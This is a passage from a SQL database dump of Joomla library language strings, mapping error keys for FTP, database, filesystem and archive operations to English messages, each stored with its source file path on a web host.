mode','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1422,'JLIB_CLIENT_ERROR_JFTP_LISTNAMES_BAD_RESPONSE','JFTP: :listNames: Bad response','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1423,'JLIB_CLIENT_ERROR_JFTP_LISTNAMES_BAD_RESPONSE_NLST','JFTP: :listNames: Bad response. Server response: %1$s [Expected: 150 or 125]. Path sent: %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1424,'JLIB_CLIENT_ERROR_JFTP_LISTNAMES_BAD_RESPONSE_TRANSFER','JFTP: :listNames: Transfer Failed. Server response: %1$s [Expected: 226]. Path sent: %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1425,'JLIB_CLIENT_ERROR_JFTP_LISTDETAILS_BAD_RESPONSE','JFTP: :listDetails: Bad response.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1426,'JLIB_CLIENT_ERROR_JFTP_LISTDETAILS_PASSIVE','JFTP: :listDetails: Unable to use passive mode.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1427,'JLIB_CLIENT_ERROR_JFTP_LISTDETAILS_BAD_RESPONSE_LIST','JFTP: :listDetails: Bad response. Server response: %1$s [Expected: 150 or 125]. Path sent: %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1428,'JLIB_CLIENT_ERROR_JFTP_LISTDETAILS_BAD_RESPONSE_TRANSFER','JFTP: :listDetails: Transfer Failed. Server response: %1$s [Expected: 226]. Path sent: %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1429,'JLIB_CLIENT_ERROR_JFTP_LISTDETAILS_UNRECOGNISED','JFTP: :listDetails: Unrecognised folder listing format.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1430,'JLIB_CLIENT_ERROR_JFTP_PUTCMD_UNCONNECTED','JFTP: :_putCmd: Not connected to the control port.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1431,'JLIB_CLIENT_ERROR_JFTP_PUTCMD_SEND','JFTP: :_putCmd: Unable to send command: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1432,'JLIB_CLIENT_ERROR_JFTP_VERIFYRESPONSE','JFTP: :_verifyResponse: Timeout or unrecognised response while waiting for a response from the server. Server response: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1433,'JLIB_CLIENT_ERROR_JFTP_PASSIVE_CONNECT_PORT','JFTP: :_passive: Not connected to the control port.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1434,'JLIB_CLIENT_ERROR_JFTP_PASSIVE_RESPONSE','JFTP: :_passive: Timeout or unrecognised response while waiting for a response from the server. Server response: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1435,'JLIB_CLIENT_ERROR_JFTP_PASSIVE_IP_OBTAIN','JFTP: :_passive: Unable to obtain IP and port for data transfer. Server response: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1436,'JLIB_CLIENT_ERROR_JFTP_PASSIVE_IP_VALID','JFTP: :_passive: IP and port for data transfer not valid. Server response: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1437,'JLIB_CLIENT_ERROR_JFTP_PASSIVE_CONNECT','JFTP: :_passive: Could not connect to host %1$s on port %2$s. Socket error number: %3$s and error message: %4$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1438,'JLIB_CLIENT_ERROR_JFTP_MODE_BINARY','JFTP: :_mode: Bad response. Server response: %s [Expected: 200]. Mode sent: Binary.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1439,'JLIB_CLIENT_ERROR_JFTP_MODE_ASCII','JFTP: :_mode: Bad response. Server response: %s [Expected: 200]. Mode sent: Ascii.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1440,'JLIB_CLIENT_ERROR_HELPER_SETCREDENTIALSFROMREQUEST_FAILED','Looks like User\'s credentials are no good.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1441,'JLIB_CLIENT_ERROR_LDAP_ADDRESS_NOT_AVAILABLE','Address not available.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1442,'JLIB_CMS_WARNING_PROVIDE_VALID_NAME','Please provide a valid, non-blank title.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1443,'JLIB_DATABASE_ERROR_ADAPTER_MYSQL','The MySQL adapter \'mysql\' is not available.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1444,'JLIB_DATABASE_ERROR_ADAPTER_MYSQLI','The MySQL adapter \'mysqli\' is not available.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1445,'JLIB_DATABASE_ERROR_BIND_FAILED_INVALID_SOURCE_ARGUMENT','%s: :bind failed. Invalid source argument.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1446,'JLIB_DATABASE_ERROR_ARTICLE_UNIQUE_ALIAS','Another article from this category has the same alias (remember it may be a trashed item).','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1447,'JLIB_DATABASE_ERROR_CATEGORY_UNIQUE_ALIAS','Another category with the same parent category has the same alias (remember it may be a trashed item).','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1448,'JLIB_DATABASE_ERROR_CHECK_FAILED','%s: :check Failed - %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1449,'JLIB_DATABASE_ERROR_CHECKIN_FAILED','%s: :check-in failed - %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1450,'JLIB_DATABASE_ERROR_CHECKOUT_FAILED','%s: :check-out failed - %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1451,'JLIB_DATABASE_ERROR_CHILD_ROWS_CHECKED_OUT','Child rows checked out.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1452,'JLIB_DATABASE_ERROR_CLASS_DOES_NOT_SUPPORT_ORDERING','%s does not support ordering.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1453,'JLIB_DATABASE_ERROR_CLASS_IS_MISSING_FIELD','Missing field in the database: %s   %s.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1454,'JLIB_DATABASE_ERROR_CLASS_NOT_FOUND_IN_FILE','Table class %s not found in file.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1455,'JLIB_DATABASE_ERROR_CONNECT_DATABASE','Unable to connect to the Database: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1456,'JLIB_DATABASE_ERROR_CONNECT_MYSQL','Could not connect to MySQL.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1457,'JLIB_DATABASE_ERROR_DATABASE_CONNECT','Could not connect to database.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1458,'JLIB_DATABASE_ERROR_DATABASE_UPGRADE_FAILED','MySQL Database Upgrade failed. Please check the <a href=\"index.php?option=com_installer&view=database\">Database Fixer</a>.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1459,'JLIB_DATABASE_ERROR_DELETE_CATEGORY','Left-Right data inconsistency. Can\'t delete category.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1460,'JLIB_DATABASE_ERROR_DELETE_FAILED','%s: :delete failed - %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1461,'JLIB_DATABASE_ERROR_DELETE_ROOT_CATEGORIES','Root categories can\'t be deleted.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1462,'JLIB_DATABASE_ERROR_EMAIL_INUSE','The email address you entered is already in use. Please enter another email address.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1463,'JLIB_DATABASE_ERROR_EMPTY_ROW_RETURNED','The database row is empty.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1464,'JLIB_DATABASE_ERROR_FUNCTION_FAILED','DB function failed with error number %s <br /><span style=\"color: red;\">%s</span>','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1465,'JLIB_DATABASE_ERROR_GET_NEXT_ORDER_FAILED','%s: :getNextOrder failed - %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1466,'JLIB_DATABASE_ERROR_GET_TREE_FAILED','%s: :getTree Failed - %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1467,'JLIB_DATABASE_ERROR_GETNODE_FAILED','%s: :_getNode Failed - %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1468,'JLIB_DATABASE_ERROR_GETROOTID_FAILED','%s: :getRootId Failed - %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1469,'JLIB_DATABASE_ERROR_HIT_FAILED','%s: :hit failed - %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1470,'JLIB_DATABASE_ERROR_INVALID_LOCATION','%s: :setLocation - Invalid location.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1471,'JLIB_DATABASE_ERROR_INVALID_NODE_RECURSION','%s: :move Failed - Can\'t move the node to be a child of itself.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1472,'JLIB_DATABASE_ERROR_INVALID_PARENT_ID','Invalid parent ID.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1473,'JLIB_DATABASE_ERROR_LANGUAGE_NO_TITLE','The language should have a title.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1474,'JLIB_DATABASE_ERROR_LANGUAGE_UNIQUE_IMAGE','A content language already exists with this Image.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1475,'JLIB_DATABASE_ERROR_LANGUAGE_UNIQUE_LANG_CODE','A content language already exists with this Language Tag.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1476,'JLIB_DATABASE_ERROR_LANGUAGE_UNIQUE_SEF','A content language already exists with this URL Language Code.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1477,'JLIB_DATABASE_ERROR_LOAD_DATABASE_DRIVER','Unable to load Database Driver: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1478,'JLIB_DATABASE_ERROR_MENUTYPE','Some menu items or some menu modules related to this menutype are checked out by another user or the default menu item is in this menu.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1479,'JLIB_DATABASE_ERROR_MENUTYPE_CHECKOUT','The user checking out does not match the user who checked out this menu and/or its linked menu module.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1480,'JLIB_DATABASE_ERROR_MENUTYPE_EMPTY','Menu type empty.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1481,'JLIB_DATABASE_ERROR_MENUTYPE_EXISTS','Menu type exists: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1482,'JLIB_DATABASE_ERROR_MENU_CANNOT_UNSET_DEFAULT','The Language parameter for this menu item must be set to \'All\'. At least one Default menu item must have Language set to All, even if the site is multilingual.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1483,'JLIB_DATABASE_ERROR_MENU_CANNOT_UNSET_DEFAULT_DEFAULT','At least one menu item has to be set as Default.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1484,'JLIB_DATABASE_ERROR_MENU_UNPUBLISH_DEFAULT_HOME','Can\'t unpublish default home.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1485,'JLIB_DATABASE_ERROR_MENU_DEFAULT_CHECKIN_USER_MISMATCH','The current home menu for this language is checked out.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1486,'JLIB_DATABASE_ERROR_MENU_UNIQUE_ALIAS','The alias <strong>%1$s</strong> is already being used by <strong>%2$s</strong> menu item in the <strong>%3$s</strong> menu (remember it may be a trashed item).','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1487,'JLIB_DATABASE_ERROR_MENU_UNIQUE_ALIAS_ROOT','Another menu item has the same alias in Root (remember it may be a trashed item). Root is the top level parent.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1488,'JLIB_DATABASE_ERROR_MENU_HOME_NOT_COMPONENT','The home menu item must be a component.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1489,'JLIB_DATABASE_ERROR_MENU_HOME_NOT_UNIQUE_IN_MENU','A menu should have only one Default home.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1490,'JLIB_DATABASE_ERROR_MENU_ROOT_ALIAS_COMPONENT','A first level menu item alias can\'t be \'component\'.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1491,'JLIB_DATABASE_ERROR_MENU_ROOT_ALIAS_FOLDER','A first level menu item alias can\'t be \'%s\' because \'%s\' is a sub-folder of your joomla installation folder.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1492,'JLIB_DATABASE_ERROR_MOVE_FAILED','%s: :move failed - %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1493,'JLIB_DATABASE_ERROR_MUSTCONTAIN_A_TITLE_CATEGORY','Category must have a title.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1494,'JLIB_DATABASE_ERROR_MUSTCONTAIN_A_TITLE_EXTENSION','Extension must have a title.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1495,'JLIB_DATABASE_ERROR_MUSTCONTAIN_A_TITLE_MENUITEM','Menu Item must have a title.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1496,'JLIB_DATABASE_ERROR_MUSTCONTAIN_A_TITLE_MODULE','Module must have a title.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1497,'JLIB_DATABASE_ERROR_MUSTCONTAIN_A_TITLE_UPDATESITE','Update site must have a title.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1498,'JLIB_DATABASE_ERROR_NEGATIVE_NOT_PERMITTED','%s can\'t be negative.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1499,'JLIB_DATABASE_ERROR_NO_ROWS_SELECTED','No rows selected.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1500,'JLIB_DATABASE_ERROR_NOT_SUPPORTED_FILE_NOT_FOUND','Table %s not supported. File not found.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1501,'JLIB_DATABASE_ERROR_NULL_PRIMARY_KEY','Null primary key not allowed.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1502,'JLIB_DATABASE_ERROR_ORDERDOWN_FAILED','%s: :orderDown Failed - %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1503,'JLIB_DATABASE_ERROR_ORDERUP_FAILED','%s: :orderUp Failed - %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1504,'JLIB_DATABASE_ERROR_PLEASE_ENTER_A_USER_NAME','Please enter a username.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1505,'JLIB_DATABASE_ERROR_PLEASE_ENTER_YOUR_NAME','Please enter your name.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1506,'JLIB_DATABASE_ERROR_PUBLISH_FAILED','%s: :publish failed - %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1507,'JLIB_DATABASE_ERROR_REBUILD_FAILED','%s: :rebuild Failed - %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1508,'JLIB_DATABASE_ERROR_REBUILDPATH_FAILED','%s: :rebuildPath Failed - %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1509,'JLIB_DATABASE_ERROR_REORDER_FAILED','%s: :reorder failed - %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1510,'JLIB_DATABASE_ERROR_REORDER_UPDATE_ROW_FAILED','%s: :reorder update the row %s failed - %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1511,'JLIB_DATABASE_ERROR_ROOT_NODE_NOT_FOUND','Root node not found.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1512,'JLIB_DATABASE_ERROR_STORE_FAILED_UPDATE_ASSET_ID','The asset_id field could not be updated.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1513,'JLIB_DATABASE_ERROR_STORE_FAILED','%1$s: :store failed<br />%2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1514,'JLIB_DATABASE_ERROR_USERGROUP_PARENT_ID_NOT_VALID','There has to be at least one root usergroup','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1515,'JLIB_DATABASE_ERROR_USERGROUP_TITLE','User group must have a title.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1516,'JLIB_DATABASE_ERROR_USERGROUP_TITLE_EXISTS','User group title already exists. Title must be unique with the same parent.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1517,'JLIB_DATABASE_ERROR_USERLEVEL_NAME_EXISTS','Level with the name "%s" already exists.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1518,'JLIB_DATABASE_ERROR_USERNAME_CANNOT_CHANGE','Can\'t use this username.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1519,'JLIB_DATABASE_ERROR_USERNAME_INUSE','Username in use.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1520,'JLIB_DATABASE_ERROR_VALID_AZ09','Please enter a valid username. No space at beginning or end, at least %d characters, must <strong>not</strong> have the following characters: < > \\ " \' % ; ( ) & and be less than 150 characters long.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1521,'JLIB_DATABASE_ERROR_VALID_MAIL','The email address you entered is invalid. Please enter another email address.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1522,'JLIB_DATABASE_ERROR_VIEWLEVEL','Viewlevel must have a title.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1523,'JLIB_DATABASE_FUNCTION_NOERROR','DB function reports no errors.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1524,'JLIB_DATABASE_QUERY_FAILED','Database query failed (error # %s): %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1525,'JLIB_DOCUMENT_ERROR_UNABLE_LOAD_DOC_CLASS','Unable to load document class.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1526,'JLIB_ENVIRONMENT_SESSION_EXPIRED','Your session has expired. Please log in again.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1527,'JLIB_ENVIRONMENT_SESSION_INVALID','Invalid session cookie. Please check that you have cookies enabled in your web browser.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1528,'JLIB_ERROR_COMPONENTS_ACL_CONFIGURATION_FILE_MISSING_OR_IMPROPERLY_STRUCTURED','The %s component\'s ACL configuration file is either missing or improperly structured.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1529,'JLIB_ERROR_INFINITE_LOOP','Infinite loop detected in JError.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1530,'JLIB_EVENT_ERROR_DISPATCHER','JEventDispatcher: :register: Event handler not recognised. Handler: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1531,'JLIB_FILESYSTEM_BZIP_NOT_SUPPORTED','BZip2 Not Supported.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1532,'JLIB_FILESYSTEM_BZIP_UNABLE_TO_READ','Unable to read archive (bz2).','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1533,'JLIB_FILESYSTEM_BZIP_UNABLE_TO_WRITE','Unable to write archive (bz2).','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1534,'JLIB_FILESYSTEM_BZIP_UNABLE_TO_WRITE_FILE','Unable to write file (bz2).','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1535,'JLIB_FILESYSTEM_GZIP_NOT_SUPPORTED','GZlib Not Supported.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1536,'JLIB_FILESYSTEM_GZIP_UNABLE_TO_READ','Unable to read archive (gz).','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1537,'JLIB_FILESYSTEM_GZIP_UNABLE_TO_WRITE','Unable to write archive (gz).','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1538,'JLIB_FILESYSTEM_GZIP_UNABLE_TO_WRITE_FILE','Unable to write file (gz).','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1539,'JLIB_FILESYSTEM_GZIP_UNABLE_TO_DECOMPRESS','Unable to decompress data.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1540,'JLIB_FILESYSTEM_TAR_UNABLE_TO_READ','Unable to read archive (tar).','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1541,'JLIB_FILESYSTEM_TAR_UNABLE_TO_DECOMPRESS','Unable to decompress data.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1542,'JLIB_FILESYSTEM_TAR_UNABLE_TO_CREATE_DESTINATION','Unable to create destination.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1543,'JLIB_FILESYSTEM_TAR_UNABLE_TO_WRITE_ENTRY','Unable to write entry.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1544,'JLIB_FILESYSTEM_ZIP_NOT_SUPPORTED','Zlib Not Supported.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1545,'JLIB_FILESYSTEM_ZIP_UNABLE_TO_READ','Unable to read archive (zip).','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1546,'JLIB_FILESYSTEM_ZIP_INFO_FAILED','Get ZIP Information failed.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1547,'JLIB_FILESYSTEM_ZIP_UNABLE_TO_CREATE_DESTINATION','Unable to create destination.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1548,'JLIB_FILESYSTEM_ZIP_UNABLE_TO_WRITE_ENTRY','Unable to write entry.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1549,'JLIB_FILESYSTEM_ZIP_UNABLE_TO_READ_ENTRY','Unable to read entry.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1550,'JLIB_FILESYSTEM_ZIP_UNABLE_TO_OPEN_ARCHIVE','Unable to open archive.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1551,'JLIB_FILESYSTEM_ZIP_INVALID_ZIP_DATA','Invalid ZIP data.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1552,'JLIB_FILESYSTEM_STREAM_FAILED','Failed to register string stream.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1553,'JLIB_FILESYSTEM_UNKNOWNARCHIVETYPE','Unknown Archive type.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1554,'JLIB_FILESYSTEM_UNABLE_TO_LOAD_ARCHIVE','Unable to load archive.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1555,'JLIB_FILESYSTEM_ERROR_JFILE_FIND_COPY','JFile: :copy: Can\'t find or read file: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1556,'JLIB_FILESYSTEM_ERROR_JFILE_STREAMS','JFile: :copy(%1$s, %2$s): %3$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1557,'JLIB_FILESYSTEM_ERROR_COPY_FAILED','Copy failed.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1558,'JLIB_FILESYSTEM_ERROR_COPY_FAILED_ERR01','Copy failed: %1$s to %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1559,'JLIB_FILESYSTEM_DELETE_FAILED','Failed deleting %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1560,'JLIB_FILESYSTEM_CANNOT_FIND_SOURCE_FILE','Can\'t find source file.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1561,'JLIB_FILESYSTEM_ERROR_JFILE_MOVE_STREAMS','JFile: :move: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1562,'JLIB_FILESYSTEM_ERROR_RENAME_FILE','Rename failed.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1563,'JLIB_FILESYSTEM_ERROR_READ_UNABLE_TO_OPEN_FILE','JFile: :read: Unable to open file: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1564,'JLIB_FILESYSTEM_ERROR_WRITE_STREAMS','JFile: :write(%1$s): %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1565,'JLIB_FILESYSTEM_ERROR_UPLOAD','JFile: :upload: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1566,'JLIB_FILESYSTEM_ERROR_WARNFS_ERR01','Warning: Failed to change file permissions!','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1567,'JLIB_FILESYSTEM_ERROR_WARNFS_ERR02','Warning: Failed to move file!','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1568,'JLIB_FILESYSTEM_ERROR_WARNFS_ERR03','Warning: File %s not uploaded for security reasons!','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1569,'JLIB_FILESYSTEM_ERROR_WARNFS_ERR04','Warning: Failed to move file: %1$s to %2$s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1570,'JLIB_FILESYSTEM_ERROR_FIND_SOURCE_FOLDER','Can\'t find source folder.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1571,'JLIB_FILESYSTEM_ERROR_FOLDER_EXISTS','Folder already exists.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1572,'JLIB_FILESYSTEM_ERROR_FOLDER_CREATE','Unable to create target folder.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1573,'JLIB_FILESYSTEM_ERROR_FOLDER_OPEN','Unable to open source folder.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1574,'JLIB_FILESYSTEM_ERROR_FOLDER_LOOP','Infinite loop detected.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1575,'JLIB_FILESYSTEM_ERROR_FOLDER_PATH','Path not in open_basedir paths.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1576,'JLIB_FILESYSTEM_ERROR_COULD_NOT_CREATE_DIRECTORY','Could not create folder.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1577,'JLIB_FILESYSTEM_ERROR_DELETE_BASE_DIRECTORY','You can\'t delete a base folder.','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1578,'JLIB_FILESYSTEM_ERROR_PATH_IS_NOT_A_FOLDER','JFolder: :delete: Path is not a folder. Path: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1579,'JLIB_FILESYSTEM_ERROR_FOLDER_DELETE','JFolder: :delete: Could not delete folder. Path: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1580,'JLIB_FILESYSTEM_ERROR_FOLDER_RENAME','Rename failed: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1581,'JLIB_FILESYSTEM_ERROR_PATH_IS_NOT_A_FOLDER_FILES','JFolder: :files: Path is not a folder. Path: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1582,'JLIB_FILESYSTEM_ERROR_PATH_IS_NOT_A_FOLDER_FOLDER','JFolder: :folder: Path is not a folder. Path: %s','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1583,'JLIB_FILESYSTEM_ERROR_STREAMS_FILE_SIZE','Failed to get file size. This may not work for all streams!','/home/smthsmth/public_html/language/en-GB/en-GB.lib_joomla.ini'),(1584,'JLIB_FILESYSTEM_ERROR_STREAMS_FILE_NOT_OPEN','File not 